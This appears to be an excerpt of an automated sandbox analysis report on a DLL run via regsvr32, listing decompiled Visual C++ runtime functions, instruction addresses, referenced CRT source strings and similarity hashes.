                                                                    				E000007FE7FEF9D26840(0,  &_v88);
                                                                    				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0xf9d3f121;
                                                                    				if (_a8 == 0) goto 0xf9d3f106;
                                                                    				_t141 = _a16;
                                                                    				 *_a8 =  *_t141 & 0x000000ff;
                                                                    				_v56 = 1;
                                                                    				E000007FE7FEF9D26800( &_v88);
                                                                    				goto 0xf9d3f31a;
                                                                    				E000007FE7FEF9D26840(_v56,  &_v88);
                                                                    				if (E000007FE7FEF9D32B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0xf9d3f276;
                                                                    				_t89 = E000007FE7FEF9D26840(_t88,  &_v88);
                                                                    				_t142 =  *_t141;
                                                                    				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0xf9d3f1f3;
                                                                    				E000007FE7FEF9D26840(_t89,  &_v88);
                                                                    				_t143 =  *_t142;
                                                                    				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0xf9d3f1f3;
                                                                    				if (_a8 == 0) goto 0xf9d3f191;
                                                                    				_v36 = 1;
                                                                    				goto 0xf9d3f199;
                                                                    				_v36 = 0;
                                                                    				_t92 = E000007FE7FEF9D26840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
                                                                    				_t144 =  *_t143;
                                                                    				_v32 = _t144;
                                                                    				E000007FE7FEF9D26840(_t92,  &_v88);
                                                                    				_v96 = _v36;
                                                                    				_v104 = _a8;
                                                                    				r9d =  *((intOrPtr*)(_v32 + 0x10c));
                                                                    				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f247;
                                                                    				E000007FE7FEF9D26840(_t94,  &_v88);
                                                                    				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0xf9d3f221;
                                                                    				_t148 = _a16;
                                                                    				if ( *((char*)(_t148 + 1)) != 0) goto 0xf9d3f247;
                                                                    				0xf9d2ab30();
                                                                    				 *_t148 = 0x2a;
                                                                    				_v52 = 0xffffffff;
                                                                    				E000007FE7FEF9D26800( &_v88);
                                                                    				goto 0xf9d3f31a;
                                                                    				E000007FE7FEF9D26840(_v52,  &_v88);
                                                                    				_t149 =  *_t148;
                                                                    				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
                                                                    				E000007FE7FEF9D26800( &_v88);
                                                                    				_t102 = _v48;
                                                                    				goto 0xf9d3f310;
                                                                    				if (_a8 == 0) goto 0xf9d3f28b;
                                                                    				_v24 = 1;
                                                                    				goto 0xf9d3f293;
                                                                    				_v24 = 0;
                                                                    				E000007FE7FEF9D26840(_t102,  &_v88);
                                                                    				_v96 = _v24;
                                                                    				_v104 = _a8;
                                                                    				r9d = 1;
                                                                    				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f2f8;
                                                                    				0xf9d2ab30();
                                                                    				 *((intOrPtr*)( *_t149)) = 0x2a;
                                                                    				_v44 = 0xffffffff;
                                                                    				E000007FE7FEF9D26800( &_v88);
                                                                    				goto 0xf9d3f31a;
                                                                    				_v40 = 1;
                                                                    				E000007FE7FEF9D26800( &_v88);
                                                                    				goto 0xf9d3f31a;
                                                                    				return E000007FE7FEF9D26800( &_v88);
                                                                    			}




























                                                                    0x7fef9d3f000
                                                                    0x7fef9d3f005
                                                                    0x7fef9d3f00a
                                                                    0x7fef9d3f00f
                                                                    0x7fef9d3f024
                                                                    0x7fef9d3f02f
                                                                    0x7fef9d3f033
                                                                    0x7fef9d3f038
                                                                    0x7fef9d3f045
                                                                    0x7fef9d3f050
                                                                    0x7fef9d3f05c
                                                                    0x7fef9d3f061
                                                                    0x7fef9d3f073
                                                                    0x7fef9d3f07d
                                                                    0x7fef9d3f082
                                                                    0x7fef9d3f08c
                                                                    0x7fef9d3f093
                                                                    0x7fef9d3f0a2
                                                                    0x7fef9d3f0a4
                                                                    0x7fef9d3f0ab
                                                                    0x7fef9d3f0b0
                                                                    0x7fef9d3f0b3
                                                                    0x7fef9d3f0c5
                                                                    0x7fef9d3f0cd
                                                                    0x7fef9d3f0cf
                                                                    0x7fef9d3f0d7
                                                                    0x7fef9d3f0e3
                                                                    0x7fef9d3f0ee
                                                                    0x7fef9d3f0f0
                                                                    0x7fef9d3f103
                                                                    0x7fef9d3f106
                                                                    0x7fef9d3f113
                                                                    0x7fef9d3f11c
                                                                    0x7fef9d3f126
                                                                    0x7fef9d3f140
                                                                    0x7fef9d3f14b
                                                                    0x7fef9d3f150
                                                                    0x7fef9d3f15a
                                                                    0x7fef9d3f165
                                                                    0x7fef9d3f16a
                                                                    0x7fef9d3f17a
                                                                    0x7fef9d3f185
                                                                    0x7fef9d3f187
                                                                    0x7fef9d3f18f
                                                                    0x7fef9d3f191
                                                                    0x7fef9d3f19e
                                                                    0x7fef9d3f1a3
                                                                    0x7fef9d3f1a6
                                                                    0x7fef9d3f1b0
                                                                    0x7fef9d3f1bc
                                                                    0x7fef9d3f1c8
                                                                    0x7fef9d3f1d2
                                                                    0x7fef9d3f1f1
                                                                    0x7fef9d3f1f8
                                                                    0x7fef9d3f20f
                                                                    0x7fef9d3f211
                                                                    0x7fef9d3f21f
                                                                    0x7fef9d3f221
                                                                    0x7fef9d3f226
                                                                    0x7fef9d3f22c
                                                                    0x7fef9d3f239
                                                                    0x7fef9d3f242
                                                                    0x7fef9d3f24c
                                                                    0x7fef9d3f251
                                                                    0x7fef9d3f25a
                                                                    0x7fef9d3f263
                                                                    0x7fef9d3f268
                                                                    0x7fef9d3f271
                                                                    0x7fef9d3f27f
                                                                    0x7fef9d3f281
                                                                    0x7fef9d3f289
                                                                    0x7fef9d3f28b
                                                                    0x7fef9d3f298
                                                                    0x7fef9d3f2a4
                                                                    0x7fef9d3f2b0
                                                                    0x7fef9d3f2b5
                                                                    0x7fef9d3f2d3
                                                                    0x7fef9d3f2d5
                                                                    0x7fef9d3f2da
                                                                    0x7fef9d3f2e0
                                                                    0x7fef9d3f2ed
                                                                    0x7fef9d3f2f6
                                                                    0x7fef9d3f2f8
                                                                    0x7fef9d3f305
                                                                    0x7fef9d3f30e
                                                                    0x7fef9d3f321

                                                                    APIs
                                                                    Strings
                                                                    • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 000007FEF9D3F0A4
                                                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 000007FEF9D3F0B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                                                    • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                                                    • API String ID: 3162172745-1617866167
                                                                    • Opcode ID: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                    • Instruction ID: 684ba7971de88d1067c150b2dc8aa1ec623b130c6e00156a0851ae80eca3a1f6
                                                                    • Opcode Fuzzy Hash: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                    • Instruction Fuzzy Hash: A9913C32A1C78586E7A0DB19E8507AEB7E0F785B45FA08136E6CD837A5DB3ED444CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                                                    • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                    • API String ID: 792801276-1329727594
                                                                    • Opcode ID: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                    • Instruction ID: 74944a5c68176a92a31906070f765b18f74d9586b7891cebb3d67554b9ce35f5
                                                                    • Opcode Fuzzy Hash: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                    • Instruction Fuzzy Hash: B2613872A0D7C186E7B49B10E8907AEBBA0F784740FA18126D6CD47BA9DB3ED404CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: __doserrno$_invalid_parameter
                                                                    • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                                                    • API String ID: 747159061-3177431134
                                                                    • Opcode ID: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                    • Instruction ID: efe890aaf17933dee885bd0091a5358479214bdc632742ad2579ba78141b5705
                                                                    • Opcode Fuzzy Hash: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                    • Instruction Fuzzy Hash: 25518C32A1864A86F7909B59E88076EB3E1F3807A5F609321E1ED077F5D7BED500CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                                                    • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                                                    • API String ID: 1608253119-1427866139
                                                                    • Opcode ID: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                    • Instruction ID: af7a509f9d9663d3d091774dda128b819ecaca6506a1d0d194354ddf51f74ba4
                                                                    • Opcode Fuzzy Hash: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                    • Instruction Fuzzy Hash: 0F41573191DB4686E7A09B20F84436E72E0F786780F614135E6CD43AF8CBBEE485CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                                                    • API String ID: 2123368286-2958264153
                                                                    • Opcode ID: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                    • Instruction ID: 82e3240dde4e8d48ae566a9cb8a6505450234aa7e72eaba3f84792f0d3cada8d
                                                                    • Opcode Fuzzy Hash: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                    • Instruction Fuzzy Hash: 3CE14D31A1DA868AEBB48B24E84076EB3E0F385765F204225E6DD43BE5DB7ED445CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: get_int64_arg
                                                                    • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 1967237116-569934968
                                                                    • Opcode ID: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                    • Instruction ID: 28cad1f176e9be3240a3a6eae7be917d28bff7715537f6893ff636485155e31a
                                                                    • Opcode Fuzzy Hash: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                    • Instruction Fuzzy Hash: 4AD11D7260DBC58BE7B1CB65E8507AEB7E4F384785F200125EAC886AA9DB7DD540CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E000007FE7FEF9D3BFDE(char _a696, char _a976) {
                                                                    
                                                                    				_a976 = _a696;
                                                                    				_a976 = _a976 - 0x41;
                                                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                    				goto __rax;
                                                                    			}



                                                                    0x7fef9d3bfe6
                                                                    0x7fef9d3bff7
                                                                    0x7fef9d3c006
                                                                    0x7fef9d3c02d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: wctomb_s
                                                                    • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2215178078-1895985292
                                                                    • Opcode ID: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                    • Instruction ID: 997c34190204a200d34649c4b27f82da9c53e16be2ae3c50a0a3632b50fb2b35
                                                                    • Opcode Fuzzy Hash: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                    • Instruction Fuzzy Hash: E5B12E7260C7C68AE7B1CB24E8457AEB7E4F384785F604126DAD887AA9DB7DD540CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                                                    • API String ID: 2123368286-348877268
                                                                    • Opcode ID: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                    • Instruction ID: 912ac3d754b702bf63931d64d46681ea7dc30ff1a731304ef262a69894a36d33
                                                                    • Opcode Fuzzy Hash: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                    • Instruction Fuzzy Hash: 60913A32A0DA4286E7A08B68E84476E77E0F394365F204625E7DD43AF8DB7EE5458F01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2192614184-4087627024
                                                                    • Opcode ID: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                    • Instruction ID: 0390e2d988dd4d1b4c77dc3c399ba89b4ed25e2388807167c80bf5b266a398b6
                                                                    • Opcode Fuzzy Hash: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                    • Instruction Fuzzy Hash: 95713A72A0D6C286E7F09B24E8947BEB7E4E384345F604126D6CD86AA9DB3ED540CF11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                                                    • API String ID: 2123368286-3692278645
                                                                    • Opcode ID: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                    • Instruction ID: a0804de238eaeeb3fb2e5788e9c0a34a411087d46cc23648724fab17a52a0f2c
                                                                    • Opcode Fuzzy Hash: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                    • Instruction Fuzzy Hash: 0E513C31A1C68686F7A0CB24E8447BE76E5F384344F604136E6CD47AB8DBBEE544CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _free_base_malloc_base
                                                                    • String ID:
                                                                    • API String ID: 3824334587-0
                                                                    • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                    • Instruction ID: 495d8382669efda2ae004298a380b2f700874c64e4d866c5cb6fbd4b09cb9029
                                                                    • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                    • Instruction Fuzzy Hash: AC312D3191D68285E7E49B60EC0437EA3E1F7853A4F214535A6DE466F5CFBEE4809B01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                                                    • API String ID: 2123368286-817335350
                                                                    • Opcode ID: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                    • Instruction ID: bdf1888ae082cb337f1151e8154f2efa45ef3de29dcf6e6b26155e3a2b634fb1
                                                                    • Opcode Fuzzy Hash: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                    • Instruction Fuzzy Hash: 6461FB36A18B4586EB64CB19E89132E77A0F785794F714126EBCD83BB4CB3ED451CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E000007FE7FEF9D2CFF0(intOrPtr _a8) {
                                                                    				intOrPtr _v24;
                                                                    				long long _v48;
                                                                    				long long _v64;
                                                                    				intOrPtr _t21;
                                                                    
                                                                    				_a8 = _t21;
                                                                    				_v48 = 0;
                                                                    				_v64 = 0;
                                                                    				_v24 = _a8;
                                                                    				_v24 = _v24 - 2;
                                                                    				if (_v24 - 0x14 > 0) goto 0xf9d2d13e;
                                                                    				goto __rax;
                                                                    			}







                                                                    0x7fef9d2cff0
                                                                    0x7fef9d2cff8
                                                                    0x7fef9d2d000
                                                                    0x7fef9d2d010
                                                                    0x7fef9d2d01b
                                                                    0x7fef9d2d024
                                                                    0x7fef9d2d048

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                                                    • API String ID: 2123368286-2245755083
                                                                    • Opcode ID: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                    • Instruction ID: 19b7c93d4736ed7bda32945b1fb5f0ab86c56f1dc684690d029957412a3b2f1f
                                                                    • Opcode Fuzzy Hash: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                    • Instruction Fuzzy Hash: 8C71E83291C786CAE7A09F58E84476EB7E0F785754F214135E6CA47BA4CB3EE448CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: HeapPointerValid
